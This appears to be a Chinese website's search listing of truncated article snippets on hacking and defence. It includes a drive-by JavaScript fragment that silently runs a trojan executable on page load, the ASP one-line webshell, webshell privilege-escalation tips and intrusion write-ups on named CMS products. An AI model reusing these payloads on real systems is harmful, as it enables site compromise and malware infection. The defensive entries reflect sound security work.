搜索列表
-
黑客如何给你的系统种木马
【安全相关】 相信很多朋友都听说过木马程序,总觉得它很神秘、很高难,但事实上随着木马软件的智能化,很多骇客都能轻松达到攻击的目的。今天,笔者就以最新的一款木马程序——黑洞2004,从种植、使用、隐藏、防范四个方面来为网络爱好者介绍一下木马的特性。需要提醒大家的是,在使用木马程序的时候,请先关闭系统中的...
|黑客|客如|如何|何给|给你|你的|的系|系统|统种|种木|木马|马| -
ADSL防御黑客攻击的十大方法
【安全相关】 目前,使用ADSL的用户越来越多,由于ADSL用户在线时间长、速度快,因此成为黑客们的攻击目标。现在网上出现了各种越来越详细的“IP地址库”,要知道一些ADSL用户的IP是非常容易的事情。要怎么保卫自己的网络安全呢?不妨看看以下方法。 一、取消文件夹隐藏共享 如果你使用了...
|AD|DS|SL|L防|防御|御黑|黑客|客攻|攻击|击的|的十|十大|大方|方法|法| -
全力打造个人网络安全之XP篇
【安全相关】 对于网民来说,各种潜在的威胁可能会随时到来。在这些威胁中,往往是“明枪好躲、暗箭难防”,网络病毒,黑客工具大家比较重视,损失相对少一些,但对于利用特殊手段窥探个人隐私的人,却有所忽视。明明已经造成隐私外泄,却毫不知情。所以采取什么样的措施才能确保个人网络安全,必然成为网络用户们最为关...
|全力|力打|打造|造个|个人|人网|网络|络安|安全|全之|之X|XP|P篇|篇| -
网页打开后自动执行木马
【安全相关】<script language="javascript"> run_exe="<OBJECT ID=\"RUNIT\" WIDTH=0 HEIGHT=0 TYPE=\"application/x-oleobject\"" run_exe+="CODEBASE=\"muma.exe#version=1,1,1,1\">" //这里的muma.exe就是我们要运行的程序&n...
网页打开后自动执行木马 -
提升(web)权限终极9技巧
【安全相关】当我们取得一个webshell时候,下一部要做的就是提升权限 个人总结如下: 1: C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere 看能否跳转到这个目录,如果行那就最好了,直接下它的CIF文件,得到pcAnywhere密码,登陆 2....
提升(web)权限终极9技巧 -
十种接近疯狂的站长—— 阿江
【网站运营】十种接近疯狂的站长—— 阿江以下十种站长多数是失败的站长,而传授他们下面的方法的那群人可能成功了。这些本来是垃圾站长的特征,却被越来越多的非垃圾站长学去,他们在不经意间把自己的心血变成了垃圾。 很多很多人在得到了那些虚假的、短暂的流量之后,才发现自己丢失了最最珍贵的东西,而一个站长在网站上付出的心血...
十种接近疯狂的站长——阿江 -
一句话木马入侵EASYNEWS新闻管理系统
【ASP编程】实例一:“一句话木马”入侵“EASYNEWS新闻管理系统” “EASYNEWS新闻管理系统 v1.01 正式版”是在企业网站中非常常见的一套整站模版,在该网站系统的留言本组件中就存在着数据过滤不严漏洞,如果网站是默认路径和默认文件名安装的话,入侵者可以利用该漏洞直接...
一句话木马入侵EASYNEWS新闻管理系统 -
eWebEditor:网站中的隐形炸弹
【ASP编程】站长在使用eWebEditor的时候是否发现,eWebEditor配置不当会使其成为网站中的隐形炸弹呢?第一次发现这漏洞源于去年的一次入侵,在山穷水尽的时候发现了eWebEditor,于是很简单就获得了WebShell。后来又有好几次利用eWebEditor进行入侵的成功经历,这才想起应该写一篇文章和大家共享一下,同时也请广大已经使用了eWe...
eWebEditor:网站中的隐形炸弹 -
一个查ASP木马的小东东
【ASP编程】关于查ASP木马的程序,记得半年前在八进制发了一个测试版(具体的URL:http://forum.eviloctal.com/read-htm-tid-19665.html),得到很多朋友的指导,学到了很多东西,非常感谢他们。现在我发的这个升级版,修补了以前的bug,加入了对一些组件写文件函数的检测,更加趋于完美了,个人认为想绕过去有点难度哦。 这回的默...
一个查ASP木马的小东东 -
也谈采集入库的技术
【ASP编程】 落伍的贴也看了很多了,发现了很多讲小偷技术的,如精华贴里的--小偷程序原理和简单示例: [url]http://www.im286.com/viewthread.php?tid=407182&extra=page%3D1[/url] 等等,也有提供采集程序下载的,但我还没看到一篇完整的入库的文章,或许是我看的贴少吧。虽然不是很深奥,我还是讲讲吧,希望高...
也谈采集入库的技术 -
编写网页木马详解
【ASP编程】我们经常听到这样的忠告:“不要随意下在不明的程序,不要随意打开邮件的附件...”这样的忠告确实是有用的,不过我们的系统有不少漏洞,许多木马已经不需要客户端和服务端了,他们利用这些系统漏洞按照被系统认为合法的代码执行木马的功能,有的木马会在你完全不知道的情况下潜入,现在我来讲解下通过IE6的漏洞实现访问网页后神...
编写网页木马详解 -
一句话木马连接客户端
【ASP编程】一句话木马连接客户端 -- BY 寂寞的刺猬 @ 520000796一句话木马(<%execute request("l")%>) 的本地连接客户端 " %> [Ctrl+A 全选 注:引入外部Js需再刷新一下页面才能执行]
一句话木马连接客户端
